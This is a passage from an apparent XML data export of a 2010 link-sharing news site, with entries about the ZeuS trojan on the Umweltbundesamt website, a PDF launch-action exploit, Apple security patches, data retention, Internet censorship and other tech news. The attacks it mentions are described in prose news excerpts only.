Einzelne Fachbereich des Umweltbundesamtes wie die Deutsche Emissionshandelsstelle (DEHSt) haben ihre Kunden bereits per Mail informiert. "Falls Sie die Internetseite des UBA zwischen Freitag, dem 19. März, und Montag, dem 22. März 2010, besucht haben, könnte sich der Trojaner auf Ihren Computer herunter geladen haben", </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Startseite des Umweltbundesamtes www.umweltbundesamt.de (UBA) war mit dem Trojaner ZeuS infiziert. Möglicherweise wurden PCs von Besuchern ebenfalls mit ZeuS infiziert. ZeuS ist ein äußerst effektiver Trojaner, der es insbesondere auf Online-Banking-Daten abgesehen hat. Er ist in der Lage, seinem Opfer eine echte Bankseite vorzugaukeln, indem er eigenen HTML-Code in den Browser schleust. Eingegebene PINs, TANs und anderen Daten verschickt er in Echtzeit unter anderem mit einem integrierten Instant-Messaging-Client. Er tarnt sich im System mittels Rootkit-Techniken.
&lt;/p&gt;
&lt;p&gt;Anzeige
Einzelne Fachbereich des Umweltbundesamtes wie die Deutsche Emissionshandelsstelle (DEHSt) haben ihre Kunden bereits per Mail informiert. "Falls Sie die Internetseite des UBA zwischen Freitag, dem 19. März, und Montag, dem 22. März 2010, besucht haben, könnte sich der Trojaner auf Ihren Computer herunter geladen haben",
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Webseite-des-Umweltbundesamtes-verteilte-Trojaner-967570.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert.png</field><field type="SlugField" name="slug">heise-online-webseite-des-umweltbundesamtes-vert</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 18:22:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">malware trojan umweltbundesamt</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="9"></object></field></object><object pk="71" model="submitter.newsentry"><field type="CharField" name="title">SEX.com filed bankruptcy</field><field type="TextField" name="excerpt">Die Zeiten sind schlecht!
With creditors swirling around the owner of an infamous website name, a California Federal Bankruptcy court must get its papers soiled as it attempts to determine whether or not a New Jersey lender can dismiss a bankruptcy action in order to pursue claimed assets.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Zeiten sind schlecht!
&lt;/p&gt;
&lt;p&gt;With creditors swirling around the owner of an infamous website name, a California Federal Bankruptcy court must get its papers soiled as it attempts to determine whether or not a New Jersey lender can dismiss a bankruptcy action in order to pursue claimed assets.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.allvoices.com/contributed-news/5509808-sex-maybe-going-bankrupt</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/sexcom-filed-bankruptcy.png</field><field type="SlugField" name="slug">sexcom-filed-bankruptcy</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 16:05:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">bankruptcy sex</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="70" model="submitter.newsentry"><field type="CharField" name="title">heise online - China: Yahoo-Mailkonten ausländischer Journalisten angegriffen</field><field type="TextField" name="excerpt">In den vergangenen Wochen wurden bis zu acht ausländische Journalisten, die in der Volkrsrepublik China oder in Taiwan arbeiten und ihre E-Mail-Konten bei Yahoo haben, Ziel von Crackerangriffen. Wie der Verband Foreign Correspondent's Club of China (FCCC) berichtet, waren verschiedene Accounts angegriffen worden. In einem Fall seien alle Mails des Accounts durch das Hinzufügen einer Standard-Forwarding-Adresse an einen unbekannten Empfänger weitergeleitet worden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In den vergangenen Wochen wurden bis zu acht ausländische Journalisten, die in der Volkrsrepublik China oder in Taiwan arbeiten und ihre E-Mail-Konten bei Yahoo haben, Ziel von Crackerangriffen. Wie der Verband Foreign Correspondent's Club of China (FCCC) berichtet, waren verschiedene Accounts angegriffen worden. In einem Fall seien alle Mails des Accounts durch das Hinzufügen einer Standard-Forwarding-Adresse an einen unbekannten Empfänger weitergeleitet worden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/China-Yahoo-Mailkonten-auslaendischer-Journalisten-angegriffen-968385.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/heise-online-china-yahoo-mailkonten-auslandisch.png</field><field type="SlugField" name="slug">heise-online-china-yahoo-mailkonten-auslandisch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 15:58:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">china yahoo</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="69" model="submitter.newsentry"><field type="CharField" name="title">heise online - PDF-Exploit funktioniert ohne konkrete Sicherheitslücke </field><field type="TextField" name="excerpt">Der PDF-Sicherheitsspezialist Didier Stevens hat ein PDF-Dokument entwickelt, das ohne eine konkrete Schwachstelle auszunutzen einen PC infizieren könnte. Der Demo-Exploit funktioniert sowohl im Adobe Reader als auch in Foxit. Stevens macht sich dabei nach eigenen Angaben die Option "Launch Actions/Launch File" zunutze, die sogar im PDF eingebettete Skripte oder EXE-Dateien starten kann diese Option ist Bestandteil der PDF-Spezifikation.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der PDF-Sicherheitsspezialist Didier Stevens hat ein PDF-Dokument entwickelt, das ohne eine konkrete Schwachstelle auszunutzen einen PC infizieren könnte. Der Demo-Exploit funktioniert sowohl im Adobe Reader als auch in Foxit. Stevens macht sich dabei nach eigenen Angaben die Option "Launch Actions/Launch File" zunutze, die sogar im PDF eingebettete Skripte oder EXE-Dateien starten kann diese Option ist Bestandteil der PDF-Spezifikation.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/PDF-Exploit-funktioniert-ohne-konkrete-Sicherheitsluecke-968031.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/heise-online-pdf-exploit-funktioniert-ohne-konkr.png</field><field type="SlugField" name="slug">heise-online-pdf-exploit-funktioniert-ohne-konkr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 15:54:06</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">adobe pdf</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object><object pk="9"></object></field></object><object pk="68" model="submitter.newsentry"><field type="CharField" name="title"> Poland Abandons Internet Censorship Plans - New Europe - WSJ</field><field type="TextField" name="excerpt">Polish Internet users have scored a major victory in their fight against a law that would have blocked certain Web sites deemed to have dangerous content. Under the weight of their online protests, Prime Minister Donald Tusk decided to abandon the proposed law, which was originally designed to block gambling sites.
The government decided to scrap the register of banned Web sites after talks between Tusk and nongovernmental organizations, according to a statement on the prime ministers Web site Thursday.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Polish Internet users have scored a major victory in their fight against a law that would have blocked certain Web sites deemed to have dangerous content. Under the weight of their online protests, Prime Minister Donald Tusk decided to abandon the proposed law, which was originally designed to block gambling sites.
&lt;/p&gt;
&lt;p&gt;The government decided to scrap the register of banned Web sites after talks between Tusk and nongovernmental organizations, according to a statement on the prime ministers Web site Thursday.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.wsj.com/new-europe/2010/02/18/poland-abandons-internet-censorship-plans/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/poland-abandons-internet-censorship-plans-new.png</field><field type="SlugField" name="slug">poland-abandons-internet-censorship-plans-new</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 14:24:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="67" model="submitter.newsentry"><field type="CharField" name="title">Mitmach-Aktion: Bei der Schufa&amp;Co (kostenlos) Auskunft verlangen!</field><field type="TextField" name="excerpt">Infolge der letzten Datenschutzreform ist es nun möglich kostenlos! bei Schufa&amp;Co Auskunft über seine gespeicherten Daten zu erhalten. Vordrucke sind vorhanden und jeder sollte mitmachen und denen das Leben schwer machen!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Infolge der letzten Datenschutzreform ist es nun möglich kostenlos! bei Schufa&amp;amp;Co Auskunft über seine gespeicherten Daten zu erhalten. Vordrucke sind vorhanden und jeder sollte mitmachen und denen das Leben schwer machen!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/mitmach-aktion-bei-schufa-co-auskunft-verlangen/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/mitmach-aktion-bei-der-schufaco-kostenlos-ausk.png</field><field type="SlugField" name="slug">mitmach-aktion-bei-der-schufaco-kostenlos-ausk</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">6</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 14:04:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">datenschutz schufa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="66" model="submitter.newsentry"><field type="CharField" name="title">Israel: Anonymität im Internet wird zum Grundrecht</field><field type="TextField" name="excerpt">Der Oberste Gerichtshof Israels hat die Anonymität von Internet-Nutzern zu einem Grundrecht von Verfassungsrang erhoben. Strafverfolgungsbehörden dürfen somit nicht mehr in allen Fällen auf identifizierende Informationen zugreifen. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Oberste Gerichtshof Israels hat die Anonymität von Internet-Nutzern zu einem Grundrecht von Verfassungsrang erhoben. Strafverfolgungsbehörden dürfen somit nicht mehr in allen Fällen auf identifizierende Informationen zugreifen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://winfuture.de/news,54485.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/israel-anonymitat-im-internet-wird-zum-grundrecht.png</field><field type="SlugField" name="slug">israel-anonymitat-im-internet-wird-zum-grundrecht</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 13:47:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">anonymity, anonymität, constitution, data retention, free speech, internet, law, redefreiheit, vds, vorratsdatenspeicherung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="65" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - Berlin: Staatsanwalt will VDS-Daten missbrauchen</field><field type="TextField" name="excerpt">Obwohl es verfassungswidrig ist, möchte der Berliner Staatsanwalt die Daten der Vorratsdatenspeicherung zur Strafverfolgung benutzen. Er beruft sich dabei auf eine Lücke im Karlsruher Urteil. Justizsenatorin von der Aue hat damit offensichtlich kein Problem.
Seit dem 1.1. 2008 wurde von allen bundesdeutschen Bürgern beispielsweise registriert, wann sie welche Nummern anriefen und wie lange die Gespräche anhielten. Für Ermittler sind dies durchaus interessante Daten. Und obwohl das Bundesverfassungsgericht diese Speicherung für illegal erklärte, will die Berliner Justiz weiterhin auf bestehendes Material zugreifen. Der Berliner Generalstaatsanwalt Ralf Rother hat für die dortigen Ermittler eine Art Bedienungsanleitung herausgegeben. Ob die Daten benutzt werden, sei "unter Abwägung der betroffenen Rechtsgüter zu entscheiden". Zu berücksichtigen sei dabei auch die "Gewichtung des staatlichen Interesses an der Tataufklärung". Unklarer geht es kaum noch.
Herr Rother beruft sich dabei auf eine Lücke im Karlsruher Urteil. Dort steht nichts von dem Verbleib der Daten, die bereits vor dem Urteil an die Behörden übermittelt wurden. Er glaubt, er und seine Mitarbeiter könnten damit arbeiten, obwohl das Bundesverfassungsgericht entschieden hat, dass die Speicherung der Verbindungsdaten einen Verstoß gegen das Fernmeldegeheimnis darstellt.
Von Berlins Justizsenatorin Gisela von der Aue (SPD) kommt auch auf Nachfrage der taz kein Widerspruch. Man sieht sich für derartige Fragestellungen nicht zuständig. Die Freigabe der Daten müsse im Einzelfall von einem Richter geprüft werden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Obwohl es verfassungswidrig ist, möchte der Berliner Staatsanwalt die Daten der Vorratsdatenspeicherung zur Strafverfolgung benutzen. Er beruft sich dabei auf eine Lücke im Karlsruher Urteil. Justizsenatorin von der Aue hat damit offensichtlich kein Problem.
Seit dem 1.1. 2008 wurde von allen bundesdeutschen Bürgern beispielsweise registriert, wann sie welche Nummern anriefen und wie lange die Gespräche anhielten. Für Ermittler sind dies durchaus interessante Daten. Und obwohl das Bundesverfassungsgericht diese Speicherung für illegal erklärte, will die Berliner Justiz weiterhin auf bestehendes Material zugreifen. Der Berliner Generalstaatsanwalt Ralf Rother hat für die dortigen Ermittler eine Art Bedienungsanleitung herausgegeben. Ob die Daten benutzt werden, sei "unter Abwägung der betroffenen Rechtsgüter zu entscheiden". Zu berücksichtigen sei dabei auch die "Gewichtung des staatlichen Interesses an der Tataufklärung". Unklarer geht es kaum noch.
&lt;/p&gt;
&lt;p&gt;Herr Rother beruft sich dabei auf eine Lücke im Karlsruher Urteil. Dort steht nichts von dem Verbleib der Daten, die bereits vor dem Urteil an die Behörden übermittelt wurden. Er glaubt, er und seine Mitarbeiter könnten damit arbeiten, obwohl das Bundesverfassungsgericht entschieden hat, dass die Speicherung der Verbindungsdaten einen Verstoß gegen das Fernmeldegeheimnis darstellt.
&lt;/p&gt;
&lt;p&gt;Von Berlins Justizsenatorin Gisela von der Aue (SPD) kommt auch auf Nachfrage der taz kein Widerspruch. Man sieht sich für derartige Fragestellungen nicht zuständig. Die Freigabe der Daten müsse im Einzelfall von einem Richter geprüft werden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/berlin-staatsanwalt-will-vds-daten-missbrauchen-2010-03-30</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/gullicom-news-berlin-staatsanwalt-will-vds-d.png</field><field type="SlugField" name="slug">gullicom-news-berlin-staatsanwalt-will-vds-d</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 09:54:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">berlin vorratsdatenspeicherung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="64" model="submitter.newsentry"><field type="CharField" name="title">gulli.com - news - TrueCrypt geknackt - oder auch nicht</field><field type="TextField" name="excerpt">"Unsere Kunden aus dem Gebiet der Strafverfolgung haben nach einer Möglichkeit zur Entschlüsselung von Truecrypt-Laufwerken verlangt - und wir haben eine praktische und effiziente Methode entwickelt, um schnell an verschlüsselte Daten heranzukommen", wirbt Passware-Chef Dmitry Sumin. Mit Hilfe der Software sollen Ermittler ohne großen Zeitverlust auch auf verschlüsselten Datenträgern nach Beweisen suchen können. Allerdings funktioniert das nur unter ganz bestimmten Bedingungen. Für eine erfolgreiche Entschlüsselung muss der beschlagnahmte Windows-Rechner eingeschaltet sein und eine Firewire-Schnittstelle besitzen - über Firewire ist es möglich, Speicherabbilder zu erstellen, auch wenn der Rechner gesperrt ist. Nur aus diesem Speicherabbild kann das Passwort für das verschlüsselte Laufwerk gewonnen werden.
800,-€ pro Jahr</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"Unsere Kunden aus dem Gebiet der Strafverfolgung haben nach einer Möglichkeit zur Entschlüsselung von Truecrypt-Laufwerken verlangt - und wir haben eine praktische und effiziente Methode entwickelt, um schnell an verschlüsselte Daten heranzukommen", wirbt Passware-Chef Dmitry Sumin. Mit Hilfe der Software sollen Ermittler ohne großen Zeitverlust auch auf verschlüsselten Datenträgern nach Beweisen suchen können. Allerdings funktioniert das nur unter ganz bestimmten Bedingungen. Für eine erfolgreiche Entschlüsselung muss der beschlagnahmte Windows-Rechner eingeschaltet sein und eine Firewire-Schnittstelle besitzen - über Firewire ist es möglich, Speicherabbilder zu erstellen, auch wenn der Rechner gesperrt ist. Nur aus diesem Speicherabbild kann das Passwort für das verschlüsselte Laufwerk gewonnen werden.
&lt;/p&gt;
&lt;p&gt;800,-€ pro Jahr
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.gulli.com/news/truecrypt-geknackt-oder-auch-nicht-2010-03-30</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/gullicom-news-truecrypt-geknackt-oder-auch.png</field><field type="SlugField" name="slug">gullicom-news-truecrypt-geknackt-oder-auch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 09:53:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">encryption</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="63" model="submitter.newsentry"><field type="CharField" name="title">Apple fixt mal eben 88 Sicherheitslücken</field><field type="TextField" name="excerpt">Direkt von Fefe kopiert...
Apple fixt mal eben 88 Sicherheitslücken. Mir ist überhaupt nur eine Firma bekannt, die so viele Bugs auf einmal gefixt hat: Oracle. Das ist selbst für Apple-Verhältnisse eine ausgesprochen sportliche Leistung. Und da sind so Brüller drin wie:
* Code Execution in Rechtschreibprüfung
* Nach dem Reboot ist manchmal die Firewall aus
* Wenn man bei AFP den Gastzugang abschaltet, ist er noch an, und man kann auf Dateien außerhalb der Share zugreifen
* Code Execution durch Audio oder Video abspielen
* Code Execution durch Plattenimage Mounten
* Rootzugriff über Directory Service oder eine der Lücken in OS Services
* Auch per FTP kann man Dateien außerhalb des FTP-Verzeichnisbaumes abrufen
* beim Chatten kann man den Server ownen
* Bilder aufmachen haben sie anscheinend einmal bei jedem verfügbaren Bildformat verkackt, sogar bei RAW-Bildern.
* Das Konvertieren von Fließkommazahlen führt zu Code Execution
* Man kann sich remote über ein altes Passwort einloggen, und Login-Restriktionen wirken auch nicht
* Postscript-Dateien öffnen führt zu Code Execution
* Quicktime ist eh eine einzige Trojaner-Deployment-Plattform
... </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Direkt von Fefe kopiert...
&lt;/p&gt;
&lt;p&gt; Apple fixt mal eben 88 Sicherheitslücken. Mir ist überhaupt nur eine Firma bekannt, die so viele Bugs auf einmal gefixt hat: Oracle. Das ist selbst für Apple-Verhältnisse eine ausgesprochen sportliche Leistung. Und da sind so Brüller drin wie:
* Code Execution in Rechtschreibprüfung
&lt;em&gt; Nach dem Reboot ist manchmal die Firewall aus
&lt;/em&gt; Wenn man bei AFP den Gastzugang abschaltet, ist er noch an, und man kann auf Dateien außerhalb der Share zugreifen
&lt;em&gt; Code Execution durch Audio oder Video abspielen
&lt;/em&gt; Code Execution durch Plattenimage Mounten
&lt;em&gt; Rootzugriff über Directory Service oder eine der Lücken in OS Services
&lt;/em&gt; Auch per FTP kann man Dateien außerhalb des FTP-Verzeichnisbaumes abrufen
&lt;em&gt; beim Chatten kann man den Server ownen
&lt;/em&gt; Bilder aufmachen haben sie anscheinend einmal bei jedem verfügbaren Bildformat verkackt, sogar bei RAW-Bildern.
&lt;em&gt; Das Konvertieren von Fließkommazahlen führt zu Code Execution
&lt;/em&gt; Man kann sich remote über ein altes Passwort einloggen, und Login-Restriktionen wirken auch nicht
&lt;em&gt; Postscript-Dateien öffnen führt zu Code Execution
&lt;/em&gt; Quicktime ist eh eine einzige Trojaner-Deployment-Plattform
...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blog.fefe.de/?ts=b54caa44</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/apple-fixt-mal-eben-88-sicherheitslucken_.png</field><field type="SlugField" name="slug">apple-fixt-mal-eben-88-sicherheitslucken</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 09:34:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object><object pk="9"></object></field></object><object pk="62" model="submitter.newsentry"><field type="CharField" name="title">53 cars towed away</field><field type="TextField" name="excerpt">fake sign pointed to a parking lot where the 53 cars got towed away while their owners were enjoying a Glenn Beck show. Summed up to $ 6,500.- for all cars.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;fake sign pointed to a parking lot where the 53 cars got towed away while their owners were enjoying a Glenn Beck show. Summed up to $ 6,500.- for all cars.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.allbestnews.net/53-cars-towed-from-ucf-while-glenn-beck-event.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/53-cars-towed-away.png</field><field type="SlugField" name="slug">53-cars-towed-away</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 09:31:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">cars fox</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="61" model="submitter.newsentry"><field type="CharField" name="title">SCO loses again: jury says Novell owns UNIX SVRX copyrights</field><field type="TextField" name="excerpt">The SCO Group was dealt a serious, potentially fatal blow today in its courtroom battle against Linux. The jury in the trial between SCO and Novell has issued a verdict affirming that Novell is the rightful owner of the UNIX SVRX copyrights. This verdict will make it difficult for SCO to continue pursuing its baseless assault on the open source operating system.
SCO cannot continue pursuing its infringement litigation against IBM or assorted Linux users because it doesn't own the copyrights that it claims are infringed by Linux. Even if the jury had ruled in SCO's favor, the overwhelming lack of evidence of infringement would still likely make it impossible for SCO to achieve victory in its litigation campaign. It's unclear if the company will be able to evade liquidation following this latest failure in court.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The SCO Group was dealt a serious, potentially fatal blow today in its courtroom battle against Linux. The jury in the trial between SCO and Novell has issued a verdict affirming that Novell is the rightful owner of the UNIX SVRX copyrights. This verdict will make it difficult for SCO to continue pursuing its baseless assault on the open source operating system.
&lt;/p&gt;
&lt;p&gt;SCO cannot continue pursuing its infringement litigation against IBM or assorted Linux users because it doesn't own the copyrights that it claims are infringed by Linux. Even if the jury had ruled in SCO's favor, the overwhelming lack of evidence of infringement would still likely make it impossible for SCO to achieve victory in its litigation campaign. It's unclear if the company will be able to evade liquidation following this latest failure in court.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/open-source/news/2010/03/sco-loses-again-jury-says-novell-owns-unix-svrx-copyrights.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/sco-loses-again-jury-says-novell-owns-unix-svrx-c.png</field><field type="SlugField" name="slug">sco-loses-again-jury-says-novell-owns-unix-svrx-c</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 23:32:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">novell sco</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="60" model="submitter.newsentry"><field type="CharField" name="title">Chinese City is World's Hacking Capital</field><field type="TextField" name="excerpt">*Maybe propaganda?*
***
Researchers based in Symantec studied over 12 billion emails and
identified that almost 30% of all malicious emails are sourced from
within China and that 21.3% came from the Chinese city of Shaoxing
alone. The researchers were also able to identify that the primary
targets for these malicious emails were human rights activists and
experts in Asian defence policy, which they claim indicates a strong
state involvement in the attacks. The research shows that 28.2% of the
targeted attacks came from China, with 21.1% coming from Romania and the
United States coming in as the third highest source of malicious emails.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;&lt;em&gt;Maybe propaganda?&lt;/em&gt;
&lt;hr /&gt;
Researchers based in Symantec studied over 12 billion emails and
identified that almost 30% of all malicious emails are sourced from
within China and that 21.3% came from the Chinese city of Shaoxing
alone. The researchers were also able to identify that the primary
targets for these malicious emails were human rights activists and
experts in Asian defence policy, which they claim indicates a strong
state involvement in the attacks. The research shows that 28.2% of the
targeted attacks came from China, with 21.1% coming from Romania and the
United States coming in as the third highest source of malicious emails.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article7078760.ece</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/chinese-city-is-worlds-hacking-capital.png</field><field type="SlugField" name="slug">chinese-city-is-worlds-hacking-capital</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 22:36:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">china e-mail malware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="59" model="submitter.newsentry"><field type="CharField" name="title">Frenchman Arrested for Hacking Twitter</field><field type="TextField" name="excerpt">French police have arrested a 25 year old unemployed man on suspicion
of hacking into a number of administrator accounts belonging to the
micro-blogging site, Twitter. French police believe the suspect, who
uses the online name of Hacker Croll, gained access to the accounts by
simply guessing the answers to the password reset questions. Once he
had access to the administrator accounts, the suspect also accessed the
Twitter accounts of well known people such as President Obama and
singers Britney Spears and Lily Allen. Should he be convicted, the
suspect could face up to 2 years in prison and a fine of EUR30,000 (US
$40,395)
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;French police have arrested a 25 year old unemployed man on suspicion
of hacking into a number of administrator accounts belonging to the
micro-blogging site, Twitter. French police believe the suspect, who
uses the online name of Hacker Croll, gained access to the accounts by
simply guessing the answers to the password reset questions. Once he
had access to the administrator accounts, the suspect also accessed the
Twitter accounts of well known people such as President Obama and
singers Britney Spears and Lily Allen. Should he be convicted, the
suspect could face up to 2 years in prison and a fine of EUR30,000 (US
$40,395)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/03/25/obama_twitter_hack_suspect_cuffed/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/frenchman-arrested-for-hacking-twitter.png</field><field type="SlugField" name="slug">frenchman-arrested-for-hacking-twitter</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 22:31:08</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">password twitter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="58" model="submitter.newsentry"><field type="CharField" name="title">DNS Error Extends Great Firewall of China</field><field type="TextField" name="excerpt">Problems with a root DNS Server in China caused computers in the United
States and Chile to come under the control of the Great Firewall of
China, resulting in requests to sites such as Facebook, Twitter and
YouTube to be redirect to Chinese servers. Once the server, operated
by the Swedish service provider Netnod, was disconnected from the
Internet, the problem was resolved. The problem was first noticed by
NIC Chile, that noticed that several ISPs were providing faulty DNS
information. China uses DNS to enforce its Great Firewall and somehow
the affected ISPs were using this DNS information. Netnod claims that
their server did not contain the faulty data that redirected traffic and
security experts believe that it must have been altered by the Chinese
